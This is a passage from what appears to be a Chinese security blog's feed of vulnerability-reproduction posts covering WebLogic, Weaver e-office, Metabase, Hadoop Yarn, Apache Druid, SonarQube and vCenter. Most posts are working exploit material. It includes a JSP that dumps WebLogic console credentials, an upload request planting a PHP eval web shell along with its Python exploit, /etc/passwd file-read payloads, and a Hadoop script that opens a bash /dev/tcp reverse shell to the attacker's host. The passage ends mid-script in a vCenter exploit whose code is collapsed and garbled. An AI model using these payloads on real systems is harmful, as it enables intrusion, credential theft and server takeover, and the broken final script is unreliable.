netsh advfirewall import c:\xxx.pol</code></pre><ul><li>POWERSHELL</li></ul><pre class="line-numbers language-none"><code class="language-none">1. Turn off the firewall for all profiles
Set-NetFirewallProfile -All -Enabled False
2. Turn on the firewall for all profiles
Set-NetFirewallProfile -All -Enabled True
3. Add an inbound rule allowing ports 80 and 443 on the Private profile
New-NetFirewallRule -DisplayName 'HTTP-Inbound' -Profile @('Private') -Direction Inbound -Action Allow -Protocol TCP -LocalPort @('80', '443')
4. Add an inbound rule allowing a specific IP to connect to 3389
New-NetFirewallRule -DisplayName "AllowRDP" -RemoteAddress 192.168.2.200 -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow</code></pre><ul><li>Port forwarding</li></ul><pre class="line-numbers language-none"><code class="language-none">1. Show all port proxy parameters
netsh interface portproxy show all
2. Forward traffic arriving on local port 6666 to port 8000 on 192.168.1.2
netsh interface portproxy add v4tov4 listenport=6666 connectport=8000 connectaddress=192.168.1.2
The port forwarding configuration is stored in the registry:
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
3. Delete the port forwarding rule
netsh interface portproxy delete v4tov4 listenport=6666</code></pre>]]></content>
<categories>
<category> Internal network security </category>
</categories>
<tags>
<tag> Internal network security </tag>
</tags>
</entry>
<entry>
<title>Obtaining the WebLogic console username and password (no decryption needed)</title>
<link href="/article/61b8d5ae.html"/>
<url>/article/61b8d5ae.html</url>
<content type="html"><![CDATA[<p>Until now, whenever I came across a WebLogic site I obtained the console password by decrypting it with the key, and there are even several different decryption methods for that.</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/144720808-7e3efafd-8126-4994-bd78-945e314ff3ac-20211206112503285.png" alt="image"></p><p>A few hours ago, however, @jas502n published <a href="https://twitter.com/jas502n/status/1467122190760177664">Use T3 protocol Get weblogic console username, password</a> on Twitter, so I immediately set about studying this technique!</p><p>Set a breakpoint and look at the code in detail:</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/144720899-5b80c842-e6dd-47c2-b2fc-e3c60ba2a8f5-20211206112525225.png" alt="image"></p><p>Code implementation</p><pre class="line-numbers language-none"><code class="language-none"><%@page import="java.lang.reflect.Field" %>
<%@page import="java.lang.reflect.Method" %>
<%
/**
 * Tested on:
 * 10.3.6.0
 */
try{
    ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
    Class httpDataTransferHandler = classLoader.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler");
    Class managementService = classLoader.loadClass("weblogic.management.provider.ManagementService");
    Class authenticatedSubject = classLoader.loadClass("weblogic.security.acl.internal.AuthenticatedSubject");
    Class propertyService = classLoader.loadClass("weblogic.management.provider.PropertyService");
    Field KERNE_ID = httpDataTransferHandler.getDeclaredField("KERNE_ID");
    KERNE_ID.setAccessible(true);
    Method getPropertyService = managementService.getMethod("getPropertyService",authenticatedSubject);
    getPropertyService.setAccessible(true);
    Object prop = getPropertyService.invoke((Object) null,KERNE_ID.get((Object) null));
    Method getTimestamp1 = propertyService.getMethod("getTimestamp1");
    getTimestamp1.setAccessible(true);
    Method getTimestamp2 = propertyService.getMethod("getTimestamp2");
    getTimestamp2.setAccessible(true);
    String username = (String) getTimestamp1.invoke(prop);
    String password = (String) getTimestamp2.invoke(prop);
    response.getWriter().write( username + "/" + password);
}catch (Exception e) {
    e.printStackTrace();
}
%></code></pre><p>Test result</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211206112550657.png" alt="image-20211206112550657"></p>]]></content>
<categories>
<category> Tips </category>
</categories>
<tags>
<tag> Weblogic </tag>
</tags>
</entry>
<entry>
<title>Weaver e-office v9.0 arbitrary file upload vulnerability (CNVD-2021-49104)</title>
<link href="/article/b8b3650.html"/>
<url>/article/b8b3650.html</url>
<content type="html"><![CDATA[<h2 id="泛微-e-office-v9-0任意文件上传漏洞-CNVD-2021-49104"><a href="#泛微-e-office-v9-0任意文件上传漏洞-CNVD-2021-49104" class="headerlink" title="泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)"></a>Weaver e-office v9.0 arbitrary file upload vulnerability (CNVD-2021-49104)</h2><p>References:</p><pre class="line-numbers language-none"><code class="language-none">https://cnvd.org.cn/flaw/show/CNVD-2021-49104
https://mp.weixin.qq.com/s/P75K_0869h-nWHRMu06zgQ
https://mp.weixin.qq.com/s/J4R-PRJq_oi58iWKh_1Oiw

Difference between Weaver OA and e-office: the commonly seen OA is ecology; e-office is the lightweight edition</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127222822790.png" alt="Weaver product family"></p><h3 id="一、漏洞概述"><a href="#一、漏洞概述" class="headerlink" title="一、漏洞概述"></a>1. Vulnerability overview</h3><p>Weaver e-office is a standard collaborative mobile office platform from Weaver.</p><p>Weaver e-office does not properly handle user input in its upload module. An attacker can craft a malicious upload request to achieve arbitrary code execution and use the vulnerability to take control of the server.</p><h3 id="二、影响范围"><a href="#二、影响范围" class="headerlink" title="二、影响范围"></a>2. Affected versions</h3><pre class="line-numbers language-none"><code class="language-none">Weaver e-office V9.0</code></pre><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>3. Reproduction</h3><p>Installer: <code>链接: https://pan.baidu.com/s/1i4DQ4YD 密码: fegm</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127213740163.png" alt="index page"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127214658848.png" alt="exploitation point"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211127214750322.png" alt="command execution"></p><h4 id="POC:"><a href="#POC:" class="headerlink" title="POC:"></a>POC:</h4><pre class="line-numbers language-none"><code class="language-none">POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 333
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php
$a=$_POST['H'];
eval("$a");
// eval executes the submitted $a as PHP statements, so assigning it a system command value executes that command
?>
--e64bdf16c554bbc109cecef6451c26a4--</code></pre><h4 id="EXP:"><a href="#EXP:" class="headerlink" title="EXP:"></a>EXP:</h4><p>Weaver e-office v9.0 arbitrary file upload vulnerability (CNVD-2021-49104)</p><pre class="line-numbers language-none"><code class="language-none">import requests
import argparse

args = argparse.ArgumentParser(description='泛微 e-office v9.0任意文件上传漏洞 (CNVD-2021-49104)')
args.add_argument('-u', help='漏洞URL<如:127.0.0.1:8080>')
args.add_argument('-e', help='执行命令')
a = args.parse_args()

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
    'Accept-Encoding': 'gzip, deflate',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Connection': 'close',
    'Accept-Language': 'zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6',
    'Cookie': 'LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348',
    'Content-Length': '193',
    'Content-Type': 'multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4'
}

#a.os = '<?php phpinfo();?>'
data = '''--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

{}
--e64bdf16c554bbc109cecef6451c26a4--'''.format(a.e)


def scan(url):
    url = url + '/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId='
    r = requests.post(url=url, data=data, headers=header)
    if r.status_code == 200 and 'logo-eoffice.php' in r.text:
        print('存在泛微 e-office v9.0任意文件上传漏洞 (CNVD-2021-49104)')
        print('请查看</images/logo/logo-eoffice.php>目录')
    else:
        print('不存在泛微 e-office v9.0任意文件上传漏洞 (CNVD-2021-49104)')


if __name__ == '__main__':
    #a.u = 'http://121.4.67.191:8082/'
    scan(a.u)</code></pre><h3 id="四、修复方案"><a href="#四、修复方案" class="headerlink" title="四、修复方案"></a>4. Remediation</h3><pre class="line-numbers language-none"><code class="language-none">The vendor has released a patch; users are advised to download and apply it:
http://v10.e-office.cn/eoffice9update/safepack.zip</code></pre>]]></content>
<categories>
<category> Vulnerability reproduction </category>
</categories>
<tags>
<tag> Weaver e-office </tag>
</tags>
</entry>
<entry>
<title>Apache ShenYu JWT authentication flaw (CVE-2021-37580)</title>
<link href="/article/c3105443.html"/>
<url>/article/c3105443.html</url>
<content type="html"><![CDATA[<h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>1. Vulnerability description</h3><p><strong>What is Apache ShenYu?</strong></p><p>Apache ShenYu is an asynchronous, high-performance, cross-language, reactive API gateway.</p><p><strong>Features:</strong></p><ul><li><p>Supports any language over HTTP, and protocols such as Dubbo, Spring Cloud, gRPC, Motan, Sofa and Tars.</p></li><li><p>Plugin-based design: plugins are hot-pluggable and easy to extend.</p></li><li><p>Flexible traffic filtering that meets a wide range of traffic-control needs.</p></li><li><p>Rich built-in plugin support: authentication, rate limiting, circuit breaking, firewall and more.</p></li><li><p>Dynamic traffic configuration with very high performance.</p></li><li><p>Supports cluster deployment, A/B testing and blue-green releases.</p></li></ul><h3 id="二、影响范围"><a href="#二、影响范围" class="headerlink" title="二、影响范围"></a>2. Affected versions</h3><pre class="line-numbers language-none"><code class="language-none">Apache ShenYu 2.3.0
Apache ShenYu 2.4.0</code></pre><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>3. Reproduction</h3><pre class="line-numbers language-none"><code class="language-none">docker pull apache/shenyu-admin:2.4.0
docker run -d -p 9095:9095 apache/shenyu-admin:2.4.0</code></pre><p>EXP: <code>https://github.com/Liang2580/CVE-2021-37580/</code></p>]]></content>
<categories>
<category> Vulnerability reproduction </category>
</categories>
<tags>
<tag> Apache ShenYu </tag>
</tags>
</entry>
<entry>
<title>Metabase sensitive information disclosure vulnerability (CVE-2021-41277)</title>
<link href="/article/94f0aed.html"/>
<url>/article/94f0aed.html</url>
<content type="html"><![CDATA[<h2 id="Metabase-敏感信息泄露漏洞(CVE-2021-41277)"><a href="#Metabase-敏感信息泄露漏洞(CVE-2021-41277)" class="headerlink" title="Metabase 敏感信息泄露漏洞(CVE-2021-41277)"></a>Metabase sensitive information disclosure vulnerability (CVE-2021-41277)</h2><h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>1. Vulnerability description</h3><p>Metabase is a simple, open-source data analytics platform.</p><p>In affected versions, the custom GeoJSON map operation (admin->settings->maps->custom maps->add a map) lacks a permission check, and an attacker can use it to obtain sensitive information. CVSS score: 9.9; severity: critical.</p><h4 id="CVE-编号"><a href="#CVE-编号" class="headerlink" title="CVE 编号"></a>CVE ID</h4><pre class="line-numbers language-none"><code class="language-none">CVE-2021-41277</code></pre><p>FOFA query: <a href="https://fofa.so/result?qbase64=YXBwPSJNZXRhYmFzZSI=">app="metabase"</a></p><h3 id="二、影响范围"><a href="#二、影响范围" class="headerlink" title="二、影响范围"></a>2. Affected versions</h3><p>Affected versions:</p><pre class="line-numbers language-none"><code class="language-none">metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5</code></pre><p>Fixed versions:</p><pre class="line-numbers language-none"><code class="language-none">metabase version >= 0.40.5
metabase version >= 1.40.5</code></pre><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>3. Reproduction</h3><h4 id="3-1-环境搭建"><a href="#3-1-环境搭建" class="headerlink" title="3.1 环境搭建"></a>3.1 Environment setup</h4><pre class="line-numbers language-none"><code class="language-none">docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128174201171.png" alt="Starting the environment"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128174233993.png" alt="Index page"></p><h4 id="3-2-EXP"><a href="#3-2-EXP" class="headerlink" title="3.2 EXP"></a>3.2 EXP</h4><p><code>Target IP:/api/geojson?url=file:/etc/passwd</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128175503869.png" alt="image-20211128175503869"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211128175434887.png" alt="image-20211128175434887"></p>]]></content>
<categories>
<category> Vulnerability reproduction </category>
</categories>
<tags>
<tag> metabase </tag>
</tags>
</entry>
<entry>
<title>Hadoop Yarn RPC unauthorized access vulnerability</title>
<link href="/article/e8c0069d.html"/>
<url>/article/e8c0069d.html</url>
<content type="html"><![CDATA[<ul><li><p>References:</p><ul><li><p><a href="https://avd.aliyun.com/detail?id=AVD-2021-864101">https://avd.aliyun.com/detail?id=AVD-2021-864101</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/0F06a7GppFz3KV3XNb-Xrg">https://mp.weixin.qq.com/s/0F06a7GppFz3KV3XNb-Xrg</a></p></li><li><p><a href="https://eviladan0s.github.io/2021/11/16/hadoop-unauth-rce/">https://eviladan0s.github.io/2021/11/16/hadoop-unauth-rce/</a></p></li><li><p><a href="https://github.com/cckuailong/YarnRpcRCE">https://github.com/cckuailong/YarnRpcRCE</a></p></li></ul></li></ul><h2 id="Hadoop-Yarn-RPC未授权访问漏洞"><a href="#Hadoop-Yarn-RPC未授权访问漏洞" class="headerlink" title="Hadoop Yarn RPC未授权访问漏洞"></a>Hadoop Yarn RPC unauthorized access vulnerability</h2><h3 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>Vulnerability description</h3><blockquote><p>Hadoop Yarn, one of Hadoop's core components, is responsible for allocating resources to the applications running in a cluster and for scheduling task execution on the different cluster nodes. The Alibaba Cloud Emergency Response Center recently detected in-the-wild exploitation of the Hadoop Yarn RPC unauthorized access vulnerability. Hadoop Yarn exposes its RPC service externally by default, and an attacker can use the RPC service to execute arbitrary commands and take control of the server. Because the access-control mechanism of the Hadoop Yarn RPC service is enabled differently from that of the REST API, the port on which the RPC service listens can still be accessed without authorization even when the REST API has authentication enabled. The Alibaba Cloud Emergency Response Center urges Apache Hadoop users to take security measures promptly to block attacks.</p></blockquote><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120235506443.png" alt="Default page"></p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Reproduction</h3><p>Through the ResourceManager REST API a user can obtain information about the cluster. The following endpoints exist:</p><pre class="line-numbers language-none"><code class="language-none">/ws/v1/cluster/apps/new-application
/ws/v1/cluster/apps</code></pre><p>One-click exploitation tool (not recommended): <a href="https://github.com/cckuailong/YarnRpcRCE/releases/tag/0.0.1">https://github.com/cckuailong/YarnRpcRCE/releases/tag/0.0.1</a></p><p>EXP: Hadoop Yarn.py</p><pre class="line-numbers language-python" data-language="python"><code class="language-python">import requests

target = 'http://Target:Port/'
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/Your IP/Port 0>&1',
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)</code></pre><ol><li>Obtain an <code>application-id</code> from the <code>new-application</code> endpoint</li></ol><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120234925491.png" alt="Obtaining the application-id"></p><ol start="2"><li>POST the reverse shell command to the <code>apps</code> endpoint</li></ol><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120235113722.png" alt="Reverse shell"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120235213233.png" alt="Success"></p><p>Remediation:</p><ul><li>1. Apache Hadoop officially recommends enabling Kerberos authentication.</li><li>2. Use security groups so that the port on which the Hadoop RPC service listens is open only to trusted addresses.</li></ul>]]></content>
<categories>
<category> Vulnerability reproduction </category>
</categories>
<tags>
<tag> Hadoop Yarn RPC </tag>
</tags>
</entry>
<entry>
<title>Apache Druid LoadData arbitrary file read vulnerability CVE-2021-36749</title>
<link href="/article/378ff17d.html"/>
<url>/article/378ff17d.html</url>
<content type="html"><![CDATA[<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>Vulnerability description</h2><p>Because the user-specified HTTP InputSource is not restricted, application-level restrictions can be bypassed by passing a file URL to the HTTP InputSource. An attacker can exploit this without authorization by crafting a malicious request that reads files, ultimately leaking sensitive information from the server.</p><h2 id="漏洞影响"><a href="#漏洞影响" class="headerlink" title="漏洞影响"></a>Affected</h2><ul><li>Apache Druid</li></ul><h2 id="FOFA"><a href="#FOFA" class="headerlink" title="FOFA"></a>FOFA</h2><ul><li>title="Apache Druid"</li></ul><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Reproduction</h2><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110191921831.png" alt="index page"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110192302719.png" alt="File read"></p><p>POC:</p><pre class="line-numbers language-none"><code class="language-none">POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 
Content-Length: 423
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}</code></pre><pre class="line-numbers language-python" data-language="python"><code class="language-python">import requests

target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
url = target_url+"/druid/indexer/v1/sampler?for=connect"
payload = "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"inputSource\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]},\"inputFormat\":{\"type\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"raw\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"1970-01-01T00:00:00Z\"},\"dimensionsSpec\":{}},\"tuningConfig\":{\"type\":\"index\"}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
headers = {
    'proxy-authorization': 'Basic Og==',
    'accept': 'application/json, text/plain, */*',
    'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',
    'content-type': 'application/json;charset=UTF-8',
    'accept-encoding': 'gzip, deflate',
    'accept-language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6',
    'connection': 'close',
    'proxy-connection': 'keep-alive',
    'content-length': '423'
}
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)</code></pre><p>Do not add a trailing <code>/</code> to the URL.</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110204420895.png" alt="EXP"></p>]]></content>
<categories>
<category> Vulnerability reproduction </category>
</categories>
<tags>
<tag> Apache Druid </tag>
</tags>
</entry>
<entry>
<title>SonarQube values information disclosure vulnerability CVE-2020-27986</title>
<link href="/article/476b0c12.html"/>
<url>/article/476b0c12.html</url>
<content type="html"><![CDATA[<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>Vulnerability description</h2><p>An API endpoint in SonarQube has an information disclosure vulnerability through which some sensitive information can be obtained.</p><h2 id="漏洞影响"><a href="#漏洞影响" class="headerlink" title="漏洞影响"></a>Affected</h2><ul><li>SonarQube</li></ul><h2 id="FOFA"><a href="#FOFA" class="headerlink" title="FOFA"></a>FOFA</h2><ul><li>app="sonarQube-代码管理"</li></ul><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Reproduction</h2><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110163540630.png" alt="index page"></p><p><strong>Vulnerability POC</strong></p><pre class="line-numbers language-none"><code class="language-none">http://xxx.xxx.xxx.xxx/api/settings/values</code></pre><p>What can be leaked: plaintext SMTP, SVN, GitLab and other sensitive settings.</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110164050129.png" alt="Json"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110165044506.png" alt="ces"></p><hr><p><strong>SonarQube search_projects project information disclosure vulnerability</strong></p><ul><li>app="sonarQube-代码管理"</li></ul><p>POC (verification):</p><p><code>http://xxx.xxx.xxx.xxx/api/components/search_projects</code></p><p>The source code of the projects can be downloaded with the following tool:</p><p><a href="https://github.com/deletescape/sloot">https://github.com/deletescape/sloot</a></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110175116606.png" alt="image-20211110175116606"></p><p><strong>Help</strong></p><pre class="line-numbers language-none"><code class="language-none">Usage of ./sloot:
  -alsologtostderr
        log to standard error as well as files
  -color
        colorize the console output (default true)
  -log_backtrace_at value
        when logging hits line file:N, emit a stack trace
  -log_dir string
        If non-empty, write log files in this directory
  -logtostderr
        log to standard error instead of files
  -n    Doesn't download discovered projects, and only prints info about them
  -q    Don't print non-fatal errors
  -s string
        Path to a Shodan download file with hosts to run against
  -stderrthreshold value
        logs at or above this threshold go to stderr
  -v value
        log level for V logs
  -verbose
        Print every file being downloaded
  -vmodule value
        comma-separated list of pattern=N settings for file-filtered logging</code></pre>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> SonarQube </tag>
</tags>
</entry>
<entry>
<title>Everything Penetration Testing Tricks</title>
<link href="/article/a4dc6685.html"/>
<url>/article/a4dc6685.html</url>
<content type="html"><![CDATA[<h3 id="前言:"><a href="#前言:" class="headerlink" title="前言:"></a>Preface:</h3><p>APT groups have long used Everything for tasks such as locating files: it is a benign, whitelisted process and it supports a command line.</p><p>"Everything" is a fast search engine for Windows that works on file and folder names.</p><p>Unlike the built-in Windows search, "Everything" lists all files and folders before you even search, which is why it is called "Everything".</p><p>Type text into the search box and it shows only the matching files and directories.</p><h3 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>Test Environment</h3><p>Target machine, Windows Server 2019: 121.4.67.xxx</p><h3 id="Everything配置"><a href="#Everything配置" class="headerlink" title="Everything配置"></a>Everything Configuration</h3><p>1. Download the 64-bit portable version: <a href="https://www.voidtools.com/Everything-1.4.1.1009.x64.zip">https://www.voidtools.com/Everything-1.4.1.1009.x64.zip</a></p><p>Command-line installation:</p><pre class="line-numbers language-none"><code class="language-none">-install-client-service    install the client service
-start-client-service      start the service<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre><p>2. Install Everything and configure it as follows</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211101145006193.png" alt="Disable the tray icon"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211101145457240.png" alt="Enable the HTTP server"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211101145551917.png" alt="image-20211101145551917"></p>]]></content>
<categories>
<category> Penetration Testing Techniques </category>
</categories>
<tags>
<tag> Everything </tag>
</tags>
</entry>
<entry>
<title>Tips for Locating Source Code</title>
<link href="/article/36071c83.html"/>
<url>/article/36071c83.html</url>
<content type="html"><![CDATA[<h2 id="寻码技术"><a href="#寻码技术" class="headerlink" title="寻码技术"></a>Code-hunting technique</h2><p><strong>Many write-ups these days have a strong survival instinct and blur out details when a vulnerability is published. Reading about someone else's vulnerability in a system you have never seen is frustrating.</strong></p><h3 id="寻某运维平台漏洞挖掘-从后台RCE到前台RCE-文章案例"><a href="#寻某运维平台漏洞挖掘-从后台RCE到前台RCE-文章案例" class="headerlink" title="寻某运维平台漏洞挖掘-从后台RCE到前台RCE 文章案例"></a>Case study: the article "Vulnerability hunting in an ops platform: from post-auth RCE to pre-auth RCE"</h3><p>Use body=""</p>]]></content>
<categories>
<category> Intelligence Analysis </category>
</categories>
<tags>
<tag> Code-hunting Tips </tag>
</tags>
</entry>
<entry>
<title>VMware vCenter Server Arbitrary File Upload Vulnerability (CVE-2021-22005)</title>
<link href="/article/f90bdb74.html"/>
<url>/article/f90bdb74.html</url>
<content type="html"><![CDATA[<h3 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>Vulnerability Description</h3><p>VMware is a vendor of cloud infrastructure and mobile business solutions that provides VMware-based virtualization. On 22 September 2021 VMware published a security advisory disclosing <strong>several medium-, high- and critical-severity vulnerabilities</strong>, among them CVE-2021-22005, an arbitrary file upload in VMware vCenter Server. In CVE-2021-22005 an attacker can send a crafted request to the Analytics service in vCenter to upload a malicious file, resulting in remote code execution.</p><h3 id="漏洞影响"><a href="#漏洞影响" class="headerlink" title="漏洞影响"></a>Affected Versions</h3><pre class="line-numbers language-none"><code class="language-none">Affected by CVE-2021-22005 (VMware vCenter Server arbitrary file upload):
VMware vCenter Server 7.0 series < 7.0 U2c
VMware vCenter Server 6.7 series < 6.7 U3o
VMware vCenter Server 6.5 series: not affected by this vulnerability
For the versions affected by the other vulnerabilities see https://www.vmware.com/security/advisories/VMSA-2021-0020.html
Fixed versions:
VMware vCenter Server 7.0 U2c
VMware vCenter Server 6.7 U3o<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>Environment Setup</h3><p><strong><a href="https://blog.csdn.net/Rio520/article/details/115664112">vCenter Server 7.0 installation</a></strong></p><p><a href="https://pan.baidu.com/s/1oW3JQWIeJoYcnbbJn8PBjw">VMware-VCSA-all-7.0.0-15952498.iso download</a> extraction code: x6fa </p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Reproduction</h3><h4 id="漏洞批量检测poc"><a href="#漏洞批量检测poc" class="headerlink" title="漏洞批量检测poc"></a>Bulk detection PoC</h4><p>To determine whether a server is affected, issue a cURL request against the /analytics/telemetry/ph/api/level endpoint:</p><p><code>curl -k -v "https://$VCENTER_HOST/analytics/telemetry/ph/api/level?_c=test"</code></p><ul><li><p>If the server responds with 200/OK and anything other than "OFF" in the response body (for example "FULL"), it is vulnerable. </p></li><li><p>If it responds with 200/OK and a body of "OFF", it is most likely not exploitable, but it is also unpatched and no workaround has been applied.</p></li><li><p>If it responds with 400/Bad Request, it has been patched. This check relies on the fact that a patched instance validates the collector ID (_c) against a list of known/accepted collector IDs.</p></li><li><p>If it responds with 404, it is either not applicable or the workaround has been applied; the workaround disables the affected API endpoint.<br>Any other status code probably means the check is not applicable.</p></li></ul><h4 id="漏洞EXP:"><a href="#漏洞EXP:" class="headerlink"
title="漏洞EXP:"></a>漏洞EXP:</h4><p><code>python3 CVE-2021-22005_poc.py -t https://ip</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030232148998.png" alt="利用方法"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030232322304.png" alt="验证0"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030232245833.png" alt="验证"></p><pre class="line-numbers language-python3" data-language="python3"><code class="language-python3">import requestsimport randomimport stringimport sysimport timeimport requestsimport urllib3import argparseurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def id_generator(size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) def escape(_str): _str = _str.replace("&", "&") _str = _str.replace("<", "<") _str = _str.replace(">", ">") _str = _str.replace("\"", """) return _str def str_to_escaped_unicode(arg_str): escaped_str = '' for s in arg_str: val = ord(s) esc_uni = "\\u{:04x}".format(val) escaped_str += esc_uni return escaped_str def createAgent(target, agent_name, log_param): url = 